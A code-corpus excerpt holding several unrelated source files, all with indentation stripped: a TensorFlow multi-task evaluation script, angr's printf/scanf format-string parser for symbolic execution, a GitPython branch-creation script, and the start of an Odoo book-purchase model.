actions_placeholder,scenes_placeholder,motivations_placeholder,ac_labels_placeholder,sc_labels_placeholder,mc_labels_placeholder,keep_pro = placeholder_inputs(
FLAGS.batch_size * gpu_num
)
tower_grads1 = []
tower_grads2 = []
tower_grads3 = []
sc_logits = []
ac_logits = []
mc_logits = []
learning_rate_sc=tf.train.exponential_decay(1e-4,global_step,decay_steps=FLAGS.max_steps/50,decay_rate=0.98,staircase=True)
learning_rate_ac=tf.train.exponential_decay(1e-4,global_step,decay_steps=FLAGS.max_steps/50,decay_rate=0.98,staircase=True)
learning_rate_mc=tf.train.exponential_decay(1e-4,global_step,decay_steps=FLAGS.max_steps/50,decay_rate=0.98,staircase=True)
tf.summary.scalar('learning_rate', learning_rate_sc)
#tf.summary.scalar('learning_rate2', learning_rate2)
opt_sc = tf.train.AdamOptimizer(learning_rate_sc)
opt_ac = tf.train.AdamOptimizer(learning_rate_ac)
opt_mc = tf.train.AdamOptimizer(learning_rate_mc)
with tf.variable_scope('var_name') as var_scope:
sc_weights = {
'w1': _variable_with_weight_decay('sc_w1', [4800, 4096], 0.005),
'w2': _variable_with_weight_decay('sc_w2', [4096, 2048], 0.005),
'out': _variable_with_weight_decay('sc_wout', [2048, model.SCNUM_CLASSES], 0.005)
}
sc_biases = {
'b1': _variable_with_weight_decay('sc_b1', [4096], 0.000),
'b2': _variable_with_weight_decay('sc_b2', [2048], 0.000),
'out': _variable_with_weight_decay('sc_bout', [model.SCNUM_CLASSES], 0.000),
}
ac_weights = {
'w1': _variable_with_weight_decay('ac_w1', [4800, 4096], 0.005),
'w2': _variable_with_weight_decay('ac_w2', [4096, 2048], 0.005),
'out': _variable_with_weight_decay('ac_wout', [2048, model.ACNUM_CLASSES], 0.005),
'W_alpha': _variable_with_weight_decay('alpha_learn', [100,100], 0.005),
'W_Ua': _variable_with_weight_decay('Ua', [100,100], 0.005),
}
ac_biases = {
'b1': _variable_with_weight_decay('ac_b1', [4096], 0.000),
'b2': _variable_with_weight_decay('ac_b2', [2048], 0.000),
'out': _variable_with_weight_decay('ac_bout', [model.ACNUM_CLASSES], 0.000),
}
mc_weights = {
'w1': _variable_with_weight_decay('mc_w1', [4800, 4096], 0.005),
'w2': _variable_with_weight_decay('mc_w2', [4096, 2048], 0.005),
'out': _variable_with_weight_decay('mc_wout', [2048, model.MCNUM_CLASSES], 0.005),
'W_beta': _variable_with_weight_decay('beta_learn', [256,100], 0.005),
'W_gama': _variable_with_weight_decay('gama_learn', [256,100], 0.005),
'W_Um': _variable_with_weight_decay('Um', [256,256], 0.005),
}
mc_biases = {
'b1': _variable_with_weight_decay('mc_b1', [4096], 0.000),
'b2': _variable_with_weight_decay('mc_b2', [2048], 0.000),
'out': _variable_with_weight_decay('mc_bout', [model.MCNUM_CLASSES], 0.000),
}
for gpu_index in range(0, gpu_num):
with tf.device('/gpu:%d' % gpu_index):
varlist1 = [ sc_weights.values(),sc_biases.values()]
varlist2 = [ ac_weights.values(),ac_biases.values()]
varlist3 = [ mc_weights.values(),mc_biases.values()]
alpha = ac_weights['W_alpha']
beta = mc_weights['W_beta']
gama = mc_weights['W_gama']
sc_logit = model.sc_model(
scenes_placeholder[gpu_index * FLAGS.batch_size:(gpu_index + 1) * FLAGS.batch_size,:],
keep_pro,
FLAGS.batch_size,
sc_weights,
sc_biases
)
ac_logit = model.ac_model(
actions_placeholder[gpu_index * FLAGS.batch_size:(gpu_index + 1) * FLAGS.batch_size,:],
sc_labels_placeholder[gpu_index * FLAGS.batch_size:(gpu_index + 1) * FLAGS.batch_size],
keep_pro,
FLAGS.batch_size,
ac_weights,
ac_biases
)
mc_logit = model.mc_model(
motivations_placeholder[gpu_index * FLAGS.batch_size:(gpu_index + 1) * FLAGS.batch_size,:],
sc_labels_placeholder[gpu_index * FLAGS.batch_size:(gpu_index + 1) * FLAGS.batch_size],
ac_labels_placeholder[gpu_index * FLAGS.batch_size:(gpu_index + 1) * FLAGS.batch_size],
keep_pro,
FLAGS.batch_size,
mc_weights,
mc_biases
)
loss_name_scope = ('gpud_%d_loss' % gpu_index)
sc_loss = tower_loss(
loss_name_scope+'_scene',
sc_logit,
sc_labels_placeholder[gpu_index * FLAGS.batch_size:(gpu_index + 1) * FLAGS.batch_size],
model.SCNUM_CLASSES
)
ac_loss = tower_loss(
loss_name_scope+'_action',
ac_logit,
ac_labels_placeholder[gpu_index * FLAGS.batch_size:(gpu_index + 1) * FLAGS.batch_size],
model.ACNUM_CLASSES
)
mc_loss = tower_loss(
loss_name_scope+'_motivation',
mc_logit,
mc_labels_placeholder[gpu_index * FLAGS.batch_size:(gpu_index + 1) * FLAGS.batch_size],
model.MCNUM_CLASSES
)
grads1 = opt_sc.compute_gradients(sc_loss, varlist1)
grads2 = opt_ac.compute_gradients(ac_loss, varlist2)
grads3 = opt_mc.compute_gradients(mc_loss, varlist3)
tower_grads1.append(grads1)
tower_grads2.append(grads2)
tower_grads3.append(grads3)
sc_logits.append(sc_logit)
ac_logits.append(ac_logit)
mc_logits.append(mc_logit)
sc_logits = tf.concat(sc_logits,0)
sc_predictions = tf.nn.top_k(sc_logits,5)
ac_logits = tf.concat(ac_logits,0)
ac_predictions = tf.nn.top_k(ac_logits,5)
mc_logits = tf.concat(mc_logits,0)
mc_predictions = tf.nn.top_k(mc_logits,5)
#sc_accuracy = tower_acc(sc_logits, sc_labels_placeholder)
sc_accuracy = topk_acc(sc_logits, sc_labels_placeholder ,5)
tf.summary.scalar('sc_accuracy', sc_accuracy)
#ac_accuracy = tower_acc(ac_logits, ac_labels_placeholder)
ac_accuracy = topk_acc(ac_logits, ac_labels_placeholder ,5)
tf.summary.scalar('ac_accuracy', ac_accuracy)
#mc_accuracy = tower_acc(mc_logits, mc_labels_placeholder)
mc_accuracy = topk_acc(mc_logits, mc_labels_placeholder ,5)
tf.summary.scalar('mc_accuracy', mc_accuracy)
grads1 = average_gradients(tower_grads1)
grads2 = average_gradients(tower_grads2)
grads3 = average_gradients(tower_grads3)
apply_gradient_sc = opt_sc.apply_gradients(grads1, global_step=global_step)
apply_gradient_ac = opt_ac.apply_gradients(grads2, global_step=global_step)
apply_gradient_mc = opt_mc.apply_gradients(grads3, global_step=global_step)
train_sc = tf.group(apply_gradient_sc)
train_ac = tf.group(apply_gradient_ac)
train_mc = tf.group(apply_gradient_mc)
null_op = tf.no_op()
# Create a saver for writing training checkpoints.
saver = tf.train.Saver(sc_weights.values() + sc_biases.values()+ac_weights.values() + ac_biases.values()+mc_weights.values() + mc_biases.values())
init = tf.global_variables_initializer()
# Create a session for running Ops on the Graph.
sess = tf.Session(
config=tf.ConfigProto(allow_soft_placement=True)
)
sess.run(init)
ckpt = tf.train.get_checkpoint_state(pre_model_save_dir)
if ckpt and ckpt.model_checkpoint_path:
print "loading checkpoint,waiting......"
saver.restore(sess, ckpt.model_checkpoint_path)
print "load complete!"
next_strat_pos=0
sc_predict_labels=[]
ac_predict_labels=[]
mc_predict_labels=[]
for step in xrange(FLAGS.max_steps):
start_time = time.time()
print('TEST Data Eval:')
val_actions,val_scenes,val_motivations,val_ac_labels,val_sc_labels,val_mc_labels,next_strat_pos, _= input_data(
filename='./list/test.list',
start_pos=next_strat_pos,
batch_size=FLAGS.batch_size * gpu_num,
shuffle=False)
sc_predict,ac_predict,mc_predict,sc_acc,ac_acc,mc_acc,sc_loss_value,ac_loss_value,mc_loss_value,A,B,G = sess.run(
[sc_predictions,ac_predictions,mc_predictions,sc_accuracy,ac_accuracy,mc_accuracy,sc_loss,ac_loss,mc_loss,alpha,beta,gama],
feed_dict={
actions_placeholder: val_actions,
scenes_placeholder:val_scenes,
motivations_placeholder:val_motivations,
ac_labels_placeholder: val_ac_labels,
sc_labels_placeholder: val_sc_labels,
mc_labels_placeholder: val_mc_labels,
keep_pro : 1
})
print ("sc_accuracy: " + "{:.5f}".format(sc_acc))
print 'sc_loss= %.2f'% np.mean(sc_loss_value)
print ("ac_accuracy: " + "{:.5f}".format(ac_acc))
print 'ac_loss= %.2f'% np.mean(ac_loss_value)
print ("mc_accuracy: " + "{:.5f}".format(mc_acc))
print 'mc_loss= %.2f'% np.mean(mc_loss_value)
np.save("alpha.npy",A)
np.save("beta.npy",B)
np.save("gama.npy",G)
#print (ac_predict)
for i in range(FLAGS.batch_size):
sc_predict_labels.append(sc_predict[1][i])
ac_predict_labels.append(ac_predict[1][i])
mc_predict_labels.append(mc_predict[1][i])
duration = time.time() - start_time
print('Batchnum %d: %.3f sec' % (step+1, duration))
break
#print predict_labels
#print val_mc_labels
print("get_predict_label_done!")
return sc_predict_labels,ac_predict_labels,mc_predict_labels
def main(_):
#for i in range(model.MCNUM_CLASSES):
# if not os.path.exist('./test/%d.txt'%i):
lines = open('./list/test.list','r')
lines = list(lines)
datasets = open('./dataset.txt','r')
datasets = list(datasets)
cluster_256=np.load('./clusters_256.npz')
cluster_100=np.load('./clusters_100.npz')
sc_label_list,ac_label_list,mc_label_list=run_training()
print (sc_label_list)
print (ac_label_list)
print (mc_label_list)
for i in range(len(sc_label_list)):
line = lines[i].strip('\n').split('\t')
dirname=line[0]
line_num = line[2]
dataset=datasets[int(line_num)].strip('\n').split('\t')
action=dataset[1]
scene=dataset[3]
motivation=dataset[2]
tmp_ac_label = cluster_100['ac'][int(line_num)]
tmp_sc_label = cluster_100['sc'][int(line_num)]
tmp_mc_label = cluster_256['mc'][int(line_num)]
f=open('./test/step1/predict.txt','a+')
f.write(dirname+'\t'+action+'\t'+motivation+'\t'+scene+'\t'+'ac_groud_truth:'+str(tmp_ac_label)+'\t'+'ac_predict:'+str(ac_label_list[i])+'mc_groud_truth:'+str(tmp_mc_label)+'\t'+'mc_predict:'+str(mc_label_list[i])+'sc_groud_truth:'+str(tmp_sc_label)+'\t'+'sc_predict:'+str(sc_label_list[i])+'\n')
if __name__ == '__main__':
tf.app.run()
``` |
{
"source": "13579and2468/angr",
"score": 3
} |
#### File: procedures/stubs/format_parser.py
```python
from typing import List, Dict, TYPE_CHECKING
from string import digits as ascii_digits
import logging
import math
import claripy
from ... import sim_type
from ...sim_procedure import SimProcedure
from ...storage.file import SimPackets
if TYPE_CHECKING:
from angr.sim_type import SimType
l = logging.getLogger(name=__name__)
ascii_digits = ascii_digits.encode()
class FormatString:
"""
Describes a format string.
"""
SCANF_DELIMITERS = [b"\x09", b"\x0a", b"\x0b", b"\x0d", b"\x20"]
def __init__(self, parser, components):
"""
Takes a list of components which are either just strings or a FormatSpecifier.
"""
self.components = components
self.parser = parser
self.string = None
@property
def state(self):
return self.parser.state
@staticmethod
def _add_to_string(string, c):
if c is None:
return string
if string is None:
return c
return string.concat(c)
def _get_str_at(self, str_addr, max_length=None):
if max_length is None:
strlen = self.parser._sim_strlen(str_addr)
#TODO: we probably could do something more fine-grained here.
# throw away strings which are just the NULL terminator
max_length = self.parser.state.solver.max_int(strlen)
if max_length == 0:
return claripy.BVV(b'')
return self.parser.state.memory.load(str_addr, max_length)
def replace(self, startpos, args):
"""
Implement printf - based on the stored format specifier information, format the values from the arg getter function `args` into a string.
:param startpos: The index of the first argument to be used by the first element of the format string
:param args: A function which, given an argument index, returns the integer argument to the current function at that index
:return: The result formatted string
"""
argpos = startpos
string = None
for component in self.components:
# if this is just concrete data
if isinstance(component, bytes):
string = self._add_to_string(string, self.parser.state.solver.BVV(component))
elif isinstance(component, str):
raise Exception("this branch should be impossible?")
elif isinstance(component, claripy.ast.BV): # pylint:disable=isinstance-second-argument-not-valid-type
string = self._add_to_string(string, component)
else:
# okay now for the interesting stuff
# what type of format specifier is it?
fmt_spec = component
if fmt_spec.spec_type == b's':
if fmt_spec.length_spec == b".*":
str_length = args(argpos)
argpos += 1
else:
str_length = None
str_ptr = args(argpos)
string = self._add_to_string(string, self._get_str_at(str_ptr, max_length=str_length))
# integers, for most of these we'll end up concretizing values..
else:
i_val = args(argpos)
c_val = int(self.parser.state.solver.eval(i_val))
c_val &= (1 << (fmt_spec.size * 8)) - 1
if fmt_spec.signed and (c_val & (1 << ((fmt_spec.size * 8) - 1))):
c_val -= (1 << fmt_spec.size * 8)
if fmt_spec.spec_type in (b'd', b'i'):
s_val = str(c_val)
elif fmt_spec.spec_type == b'u':
s_val = str(c_val)
elif fmt_spec.spec_type == b'c':
s_val = chr(c_val & 0xff)
elif fmt_spec.spec_type == b'x':
s_val = hex(c_val)[2:]
elif fmt_spec.spec_type == b'o':
s_val = oct(c_val)[2:]
elif fmt_spec.spec_type == b'p':
s_val = hex(c_val)
else:
raise SimProcedureError("Unimplemented format specifier '%s'" % fmt_spec.spec_type)
if isinstance(fmt_spec.length_spec, int):
s_val = s_val.rjust(fmt_spec.length_spec, fmt_spec.pad_chr)
string = self._add_to_string(string, self.parser.state.solver.BVV(s_val.encode()))
argpos += 1
return string
def interpret(self, startpos, args, addr=None, simfd=None):
"""
implement scanf - extract formatted data from memory or a file according to the stored format
specifiers and store them into the pointers extracted from `args`.
:param startpos: The index of the first argument corresponding to the first format element
:param args: A function which, given the index of an argument to the function, returns that argument
:param addr: The address in the memory to extract data from, or...
:param simfd: A file descriptor to use for reading data from
:return: The number of arguments parsed
"""
if simfd is not None and isinstance(simfd.read_storage, SimPackets):
argnum = startpos
for component in self.components:
if type(component) is bytes:
sdata, _ = simfd.read_data(len(component), short_reads=False)
self.state.add_constraints(sdata == component)
elif isinstance(component, claripy.Bits):
sdata, _ = simfd.read_data(len(component) // 8, short_reads=False)
self.state.add_constraints(sdata == component)
elif component.spec_type == b's':
if component.length_spec is None:
sdata, slen = simfd.read_data(self.state.libc.buf_symbolic_bytes)
else:
sdata, slen = simfd.read_data(component.length_spec)
for byte in sdata.chop(8):
self.state.add_constraints(claripy.And(*[byte != char for char in self.SCANF_DELIMITERS]))
self.state.memory.store(args(argnum), sdata, size=slen)
self.state.memory.store(args(argnum) + slen, claripy.BVV(0, 8))
argnum += 1
elif component.spec_type == b'c':
sdata, _ = simfd.read_data(1, short_reads=False)
self.state.memory.store(args(argnum), sdata)
argnum += 1
else:
bits = component.size * 8
if component.spec_type == b'x':
base = 16
elif component.spec_type == b'o':
base = 8
else:
base = 10
# here's the variable representing the result of the parsing
target_variable = self.state.solver.BVS('scanf_' + component.string.decode(), bits,
key=('api', 'scanf', argnum - startpos, component.string))
negative = claripy.SLT(target_variable, 0)
# how many digits does it take to represent this variable fully?
max_digits = int(math.ceil(math.log(2**bits, base)))
# how many digits does the format specify?
spec_digits = component.length_spec
# how many bits can we specify as input?
available_bits = float('inf') if spec_digits is None else spec_digits * math.log(base, 2)
not_enough_bits = available_bits < bits
# how many digits will we model this input as?
digits = max_digits if spec_digits is None else spec_digits
# constrain target variable range explicitly if it can't take on all possible values
if not_enough_bits:
self.state.add_constraints(self.state.solver.And(
self.state.solver.SLE(target_variable, (base**digits) - 1),
self.state.solver.SGE(target_variable, -(base**(digits - 1) - 1))))
# perform the parsing in reverse - constrain the input digits to be the string version of the input
# this only works because we're reading from a packet stream and therefore nobody has the ability
# to add other constraints to this data!
# this makes z3's job EXTREMELY easy
sdata, _ = simfd.read_data(digits, short_reads=False)
for i, digit in enumerate(reversed(sdata.chop(8))):
digit_value = (target_variable // (base**i)) % base
digit_ascii = digit_value + ord('0')
if base > 10:
digit_ascii = claripy.If(digit_value >= 10, digit_value + (-10 + ord('a')), digit_ascii)
# if there aren't enough bits, we can increase the range by accounting for the possibility that
# the first digit is a minus sign
if not_enough_bits:
if i == digits - 1:
neg_digit_ascii = ord('-')
else:
neg_digit_value = (-target_variable // (base**i)) % base
neg_digit_ascii = neg_digit_value + ord('0')
if base > 10:
neg_digit_ascii = claripy.If(neg_digit_value >= 10, neg_digit_value + (-10 + ord('a')), neg_digit_ascii)
digit_ascii = claripy.If(negative, neg_digit_ascii, digit_ascii)
self.state.add_constraints(digit == digit_ascii[7:0])
self.state.memory.store(args(argnum), target_variable, endness=self.state.arch.memory_endness)
argnum += 1
return argnum - startpos
if simfd is not None:
region = simfd.read_storage
addr = simfd._pos if hasattr(simfd, '_pos') else simfd._read_pos # XXX THIS IS BAD
else:
region = self.parser.state.memory
bits = self.parser.state.arch.bits
failed = self.parser.state.solver.BVV(0, bits)
argpos = startpos
position = addr
for component in self.components:
if isinstance(component, bytes):
# TODO we skip non-format-specifiers in format string interpretation for now
# if the region doesn't match the concrete component, we need to return immediately
pass
else:
fmt_spec = component
try:
dest = args(argpos)
except SimProcedureArgumentError:
dest = None
if fmt_spec.spec_type == b's':
# set some limits for the find
max_str_len = self.parser.state.libc.max_str_len
max_sym_bytes = self.parser.state.libc.buf_symbolic_bytes
# has the length of the format been limited by the string itself?
if fmt_spec.length_spec is not None:
max_str_len = fmt_spec.length_spec
max_sym_bytes = fmt_spec.length_spec
# TODO: look for limits on other characters which scanf is sensitive to, '\x00', '\x20'
_, _, match_indices = region.find(position, self.parser.state.solver.BVV(b'\n'), max_str_len,
max_symbolic_bytes=max_sym_bytes)
if not match_indices:
# if no newline is found, mm is position + max_strlen
mm = position + max_str_len
# we're just going to concretize the length, load will do this anyways
length = self.parser.state.solver.max_int(mm - position)
else:
# a newline is found, or a max length is specified with the specifier
length = max(match_indices)
src_str = region.load(position, length)
# TODO all of these should be delimiters we search for above
# add that the contents of the string cannot be any scanf %s string delimiters
for delimiter in set(FormatString.SCANF_DELIMITERS):
delim_bvv = self.parser.state.solver.BVV(delimiter)
for i in range(length):
self.parser.state.add_constraints(region.load(position + i, 1) != delim_bvv)
# write it out to the pointer
self.parser.state.memory.store(dest, src_str)
# store the terminating null byte
self.parser.state.memory.store(dest + length, self.parser.state.solver.BVV(0, 8))
position += length
else:
# XXX: atoi only supports strings of one byte
if fmt_spec.spec_type in [b'd', b'i', b'u', b'x']:
base = 16 if fmt_spec.spec_type == b'x' else 10
status, i, num_bytes = self.parser._sim_atoi_inner(position, region, base=base, read_length=fmt_spec.length_spec)
# increase failed count if we were unable to parse it
failed = self.parser.state.solver.If(status, failed, failed + 1)
position += num_bytes
elif fmt_spec.spec_type == b'c':
i = region.load(position, 1)
i = i.zero_extend(bits - 8)
position += 1
else:
raise SimProcedureError("unsupported format spec '%s' in interpret" % fmt_spec.spec_type)
i = self.parser.state.solver.Extract(fmt_spec.size*8-1, 0, i)
self.parser.state.memory.store(dest, i, size=fmt_spec.size, endness=self.parser.state.arch.memory_endness)
argpos += 1
if simfd is not None:
_, realsize = simfd.read_data(position - addr)
self.state.add_constraints(realsize == position - addr)
return (argpos - startpos) - failed
def __repr__(self):
outstr = ""
for comp in self.components:
if isinstance(comp, bytes):
outstr += comp.decode("ascii")
else:
outstr += (str(comp))
return outstr
class FormatSpecifier:
"""
Describes a format specifier within a format string.
"""
__slots__ = ('string', 'size', 'signed', 'length_spec', 'pad_chr', )
def __init__(self, string, length_spec, pad_chr, size, signed):
self.string = string
self.size = size
self.signed = signed
self.length_spec = length_spec
self.pad_chr = pad_chr
@property
def spec_type(self):
return self.string[-1:].lower()
def __str__(self):
return "%%%s" % self.string.decode()
def __len__(self):
return len(self.string)
class FormatParser(SimProcedure):
"""
For SimProcedures relying on printf-style format strings.
"""
ARGS_MISMATCH = True
# Basic conversion specifiers for format strings, mapped to sim_types
# TODO: support for C and S that are deprecated.
# TODO: We only consider POSIX locales here.
basic_spec = {
b'd': sim_type.SimTypeInt(), # 'int',
b'i': sim_type.SimTypeInt(), # 'int',
b'o': sim_type.SimTypeInt(signed=False), # 'unsigned int',
b'u': sim_type.SimTypeInt(signed=False), # 'unsigned int',
b'x': sim_type.SimTypeInt(signed=False), # 'unsigned int',
b'X': sim_type.SimTypeInt(signed=False), # 'unsigned int',
b'e': sim_type.SimTypeDouble(), # 'double',
b'E': sim_type.SimTypeDouble(), # 'double',
b'f': sim_type.SimTypeDouble(), # 'double',
b'F': sim_type.SimTypeDouble(), # 'double',
b'g': sim_type.SimTypeDouble(), # 'double',
b'G': sim_type.SimTypeDouble(), # 'double',
b'a': sim_type.SimTypeDouble(), # 'double',
b'A': sim_type.SimTypeDouble(), # 'double',
b'c': sim_type.SimTypeChar(), # 'char',
b's': sim_type.SimTypePointer(sim_type.SimTypeChar()), # 'char*',
b'p': sim_type.SimTypePointer(sim_type.SimTypeInt(signed=False)), # 'uintptr_t',
b'n': sim_type.SimTypePointer(sim_type.SimTypeInt(signed=False)), # 'uintptr_t', # pointer to num bytes written so far
#b'm': None, # Those don't expect any argument
#b'%': None, # Those don't expect any argument
}
# Signedness of integers
int_sign = {
'signed': [b'd', b'i'],
'unsigned' : [b'o', b'u', b'x', b'X']
}
# Length modifiers and how they apply to integer conversion (signed / unsigned).
int_len_mod = {
b'hh': (sim_type.SimTypeChar(), sim_type.SimTypeChar(signed=False)), # ('char', 'uint8_t'),
b'h' : (sim_type.SimTypeShort(), sim_type.SimTypeShort(signed=False)), # ('int16_t', 'uint16_t'),
b'l' : (sim_type.SimTypeLong(), sim_type.SimTypeLong(signed=False)), # ('long', 'unsigned long'),
# FIXME: long long is 64bit according to stdint.h on Linux, but that might not always be the case
b'll' : (sim_type.SimTypeLongLong(), sim_type.SimTypeLongLong(signed=False)), # ('int64_t', 'uint64_t'),
# FIXME: intmax_t seems to be always 64 bit, but not too sure
b'j' : (sim_type.SimTypeLongLong(), sim_type.SimTypeLongLong(signed=False)), # ('int64_t', 'uint64_t'),
b'z' : (sim_type.SimTypeLength(signed=True), sim_type.SimTypeLength(signed=False)), # ('ssize', 'size_t'),
b't' : (sim_type.SimTypeLong(), sim_type.SimTypeLong()), # ('ptrdiff_t', 'ptrdiff_t'),
}
# Types that are not known by sim_types
# Maps to (size, signedness)
other_types = {
('string',): lambda _:(0, True) # special value for strings, we need to count
}
# Those flags affect the formatting the output string
flags = ['#', '0', r'\-', r' ', r'\+', r'\'', 'I']
_MOD_SPEC = None
_ALL_SPEC = None
@property
def _mod_spec(self):
"""
Modified length specifiers: mapping between length modifiers and conversion specifiers. This generates all the
possibilities, i.e. hhd, etc.
"""
if FormatParser._MOD_SPEC is None:
mod_spec = { }
for mod, sizes in self.int_len_mod.items():
for conv in self.int_sign['signed']:
mod_spec[mod + conv] = sizes[0]
for conv in self.int_sign['unsigned']:
mod_spec[mod + conv] = sizes[1]
FormatParser._MOD_SPEC = mod_spec
return FormatParser._MOD_SPEC
@property
def _all_spec(self) -> Dict[bytes,'SimType']:
"""
All specifiers and their lengths.
"""
if FormatParser._ALL_SPEC is None:
base = dict(self._mod_spec)
for spec in self.basic_spec:
base[spec] = self.basic_spec[spec]
FormatParser._ALL_SPEC = base
return FormatParser._ALL_SPEC
# Tricky stuff
# Note that $ is not C99 compliant (but posix specific).
def _match_spec(self, nugget):
"""
match the string `nugget` to a format specifier.
"""
# TODO: handle positional modifiers and other similar format string tricks.
all_spec = self._all_spec
# iterate through nugget throwing away anything which is an int
# TODO store this in a size variable
original_nugget = nugget
length_str = [ ]
length_spec = None
length_spec_str_len = 0
pad_chr = " "
if nugget.startswith(b".*"):
# ".*": precision is specified as an argument
nugget = nugget[2:]
length_spec = b".*"
length_spec_str_len = 2
elif nugget.startswith(b"0"):
pad_chr = "0"
for j, c in enumerate(nugget):
if c in ascii_digits:
length_str.append(c)
else:
nugget = nugget[j:]
if length_spec is None:
length_spec = None if len(length_str) == 0 else int(bytes(length_str))
break
# we need the length of the format's length specifier to extract the format and nothing else
if length_spec_str_len == 0 and length_str:
length_spec_str_len = len(length_str)
# is it an actual format?
for spec in all_spec:
if nugget.startswith(spec):
# this is gross coz sim_type is gross..
nugget = nugget[:len(spec)]
original_nugget = original_nugget[:(length_spec_str_len + len(spec))]
nugtype: 'SimType' = all_spec[nugget]
try:
typeobj = nugtype.with_arch(self.state.arch if self.state is not None else self.project.arch)
except Exception:
raise SimProcedureError("format specifier uses unknown type '%s'" % repr(nugtype))
return FormatSpecifier(original_nugget, length_spec, pad_chr, typeobj.size // 8, typeobj.signed)
return None
def extract_components(self, fmt: List) -> List:
"""
Extract the actual formats from the format string `fmt`.
:param fmt: A list of format chars.
:returns: a FormatString object
"""
# iterate over the format string looking for format specifiers
components = [ ]
i = 0
while i < len(fmt):
if type(fmt[i]) is bytes and fmt[i] == b"%":
# Note that we only support concrete format specifiers
# grab the specifier
# go to the space
specifier = b""
for c in fmt[i+1:]:
if type(c) is bytes:
specifier += c
else:
break
specifier = self._match_spec(specifier)
if specifier is not None:
i += len(specifier)
components.append(specifier)
else:
# if we get here we didn't match any specs, the first char will be thrown away
# and we'll add the percent
i += 1
components.append(b'%')
else:
# claripy ASTs, which are usually symbolic variables
# They will be kept as they are - even if those chars can be evaluated to "%"
components.append(fmt[i])
i += 1
return components
def _get_fmt(self, fmt):
"""
Extract the actual formats from the format string `fmt`.
:param list fmt: A list of format chars.
:returns: a FormatString object
"""
components = self.extract_components(fmt)
return FormatString(self, components)
def _sim_atoi_inner(self, str_addr, region, base=10, read_length=None):
"""
Return the result of invoking the atoi simprocedure on `str_addr`.
"""
from .. import SIM_PROCEDURES # pylint:disable=import-outside-toplevel
strtol = SIM_PROCEDURES['libc']['strtol']
return strtol.strtol_inner(str_addr, self.state, region, base, True, read_length=read_length)
def _sim_strlen(self, str_addr):
"""
Return the result of invoking the strlen simprocedure on `str_addr`.
"""
from .. import SIM_PROCEDURES # pylint:disable=import-outside-toplevel
strlen = SIM_PROCEDURES['libc']['strlen']
return self.inline_call(strlen, str_addr).ret_expr
def _parse(self, fmt_idx):
"""
Parse format strings.
:param fmt_idx: The index of the (pointer to the) format string in the arguments list.
:returns: A FormatString object which can be used for replacing the format specifiers with arguments or
for scanning into arguments.
"""
fmtstr_ptr = self.arg(fmt_idx)
if self.state.solver.symbolic(fmtstr_ptr):
raise SimProcedureError("Symbolic pointer to (format) string :(")
length = self._sim_strlen(fmtstr_ptr)
if self.state.solver.symbolic(length):
all_lengths = self.state.solver.eval_upto(length, 2)
if len(all_lengths) != 1:
raise SimProcedureError("Symbolic (format) string, game over :(")
length = all_lengths[0]
if self.state.solver.is_true(length == 0):
return FormatString(self, [b""])
fmt_xpr = self.state.memory.load(fmtstr_ptr, length)
fmt = [ ]
for i in range(fmt_xpr.size(), 0, -8):
char = fmt_xpr[i - 1 : i - 8]
try:
conc_char = self.state.solver.eval_one(char)
except SimSolverError:
# For symbolic chars, just keep them symbolic
fmt.append(char)
else:
# Concrete chars are directly appended to the list
fmt.append(bytes([conc_char]))
# make a FormatString object
fmt_str = self._get_fmt(fmt)
l.debug("Fmt: %r", fmt_str)
return fmt_str
class ScanfFormatParser(FormatParser):
"""
For SimProcedures relying on scanf-style format strings.
"""
basic_spec = {
b'd': sim_type.SimTypeInt(), # 'int',
b'i': sim_type.SimTypeInt(), # 'int',
b'o': sim_type.SimTypeInt(signed=False), # 'unsigned int',
b'u': sim_type.SimTypeInt(signed=False), # 'unsigned int',
b'x': sim_type.SimTypeInt(signed=False), # 'unsigned int',
b'X': sim_type.SimTypeInt(signed=False), # 'unsigned int',
b'e': sim_type.SimTypeFloat(), # 'float',
b'E': sim_type.SimTypeFloat(), # 'float',
b'f': sim_type.SimTypeFloat(), # 'float',
b'F': sim_type.SimTypeFloat(), # 'float',
b'g': sim_type.SimTypeFloat(), # 'float',
b'G': sim_type.SimTypeFloat(), # 'float',
b'a': sim_type.SimTypeFloat(), # 'float',
b'A': sim_type.SimTypeFloat(), # 'float',
b'c': sim_type.SimTypeChar(), # 'char',
b's': sim_type.SimTypePointer(sim_type.SimTypeChar()), # 'char*',
b'p': sim_type.SimTypePointer(sim_type.SimTypeInt(signed=False)), # 'uintptr_t',
b'n': sim_type.SimTypePointer(sim_type.SimTypeInt(signed=False)),
}
# All float conversion specifiers
float_spec = [b'e', b'E', b'f', b'F', b'g', b'G', b'a', b'A']
# Length modifiers and how they apply to float conversion.
float_len_mod = {
b'l': sim_type.SimTypeDouble, # 'double',
b'll': sim_type.SimTypeDouble, # 'long double',
}
@property
def _mod_spec(self):
"""
Modified length specifiers: mapping between length modifiers and conversion specifiers. This generates all the
possibilities, i.e. lf, etc.
"""
if FormatParser._MOD_SPEC is None:
mod_spec = dict(super()._mod_spec.items())
for mod, size in self.float_len_mod.items():
for conv in self.float_spec:
mod_spec[mod + conv] = size
FormatParser._MOD_SPEC = mod_spec
return FormatParser._MOD_SPEC
from angr.errors import SimProcedureArgumentError, SimProcedureError, SimSolverError
``` |
{
"source": "13579and2468/osc2022",
"score": 3
} |
#### File: osc2022/tools/update-branchs.py
```python
import argparse
import typing
import yaml
import git
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('file')
args = parser.parse_args()
with open(args.file) as f:
ids = yaml.safe_load(f)
# find origin
repo = git.Repo(".")
origin = repo.remote(name='origin')
fetch_infos: typing.List[git.remote.FetchInfo] = origin.fetch()
source_branch: git.RemoteReference = origin.refs["0856085-example"]
origin_head = repo.head.ref
source_branch.checkout()
def exist_branch(name: str) -> bool:
for info in fetch_infos:
if name in info.name:
return True
return False
push_count = 0
try:
for idx in ids:
if exist_branch(idx):
print(f'{idx} already exists!')
continue
print(f'create {idx} & push ...')
# create branch
h = repo.create_head(idx)
# push
origin.push(idx)
# remove local
repo.delete_head(h)
push_count += 1
print(f'total: {len(ids)}, push {push_count} branch')
finally:
origin_head.checkout()
``` |
{
"source": "13611843966/odooExtModel",
"score": 2
} |
#### File: odoo_book_lending/models/books_purchase.py
```python
import logging
from odoo import api, fields, models
from odoo.exceptions import UserError
_logger = logging.getLogger(__name__)
class BooksPurchase(models.Model):
_description = '图书采购'
_name = 'odoo.books.purchase'
_inherit = ['mail.thread', 'mail.activity.mixin']
_rec_name = 'code'
PURCHASESTATE = [
('draft', '草稿'),
('purchase', '采购中'),
('confirm', '已完成'),
('close', '作废'),
]
name = fields.Char(string="采购标题", required=True, track_visibility='onchange')
code = fields.Char(string="采购编号", index=True, track_visibility='onchange', default='New')
